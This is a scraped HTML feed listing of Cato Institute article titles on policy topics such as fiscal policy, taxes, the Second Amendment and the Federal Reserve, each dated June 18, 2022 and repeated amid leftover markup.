What the Second Amendment Permits<\/p><\/div><\/li>
<\/span><\/a><\/div>James M. Buchanan, RIP<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:05 am <\/small>
James M. Buchanan, RIP<\/p><\/div><\/li>
<\/span><\/a><\/div>Economic Freedom of the States of India<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:04 am <\/small>
Economic Freedom of the States of India<\/p><\/div><\/li>
<\/span><\/a><\/div>China, America, and the Pivot to Asia<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:04 am <\/small>
China, America, and the Pivot to Asia<\/p><\/div><\/li>
<\/span><\/a><\/div>Why the Hagel Nomination Matters<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:04 am <\/small>
Why the Hagel Nomination Matters<\/p><\/div><\/li>
<\/span><\/a><\/div>A Rational Response to the Privacy \u2018Crisis\u2019<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:04 am <\/small>
A Rational Response to the Privacy Crisis<\/p><\/div><\/li>
<\/span><\/a><\/div>New Regulation Tackles ObamaCare, TSA Screening<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:04 am <\/small>
New <em>Regulation<\/em> Tackles ObamaCare, TSA Screening<\/p><\/div><\/li>
<\/span><\/a><\/div>Should U.S. Fiscal Policy Address Slow Growth or the Debt?<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:04 am <\/small>
Should U.S. Fiscal Policy Address Slow Growth or the Debt?<\/p><\/div><\/li>
<\/span><\/a><\/div>Grading the Fiscal Cliff Deal<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:04 am <\/small>
Grading the Fiscal Cliff Deal<\/p><\/div><\/li>
<\/span><\/a><\/div>Make a Year-End Gift to Cato<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:03 am <\/small>
Make a Year-End Gift to Cato<\/p><\/div><\/li>
<\/span><\/a><\/div>Advantages of Low Capital Gains Tax Rates<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:03 am <\/small>
Advantages of Low Capital Gains Tax Rates<\/p><\/div><\/li>
<\/span><\/a><\/div>Happy Holidays from Cato<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:03 am <\/small>
Happy Holidays from Cato<\/p><\/div><\/li>
<\/span><\/a><\/div>How Fossil Fuels Saved Humanity from Nature and Nature from Humanity<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 3:03 am <\/small>
How Fossil Fuels Saved Humanity from Nature and Nature from Humanity<\/p><\/div><\/li>
<\/span><\/a><\/div>An Inexorable March to Legalization?<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 2:43 am <\/small>
An Inexorable March to Legalization?<\/p><\/div><\/li>
<\/span><\/a><\/div>Military Spending Cuts No Reason to Compromise on Taxes<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 2:43 am <\/small>
Military Spending Cuts No Reason to Compromise on Taxes<\/p><\/div><\/li>
<\/span><\/a><\/div>The Fire Next Door: Mexico\u2019s Drug Violence and the Danger to America<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 2:43 am <\/small>
The Fire Next Door: Mexico's Drug Violence and the Danger to America<\/p><\/div><\/li>
<\/span><\/a><\/div>Has the Fed Been a Failure?<\/a><\/span>
by Cato Institute<\/a> on June 18, 2022 at 2:43 am <\/small>
Has the Fed Been a Failure?<\/p><\/div><\/li><\/ul> <\/div>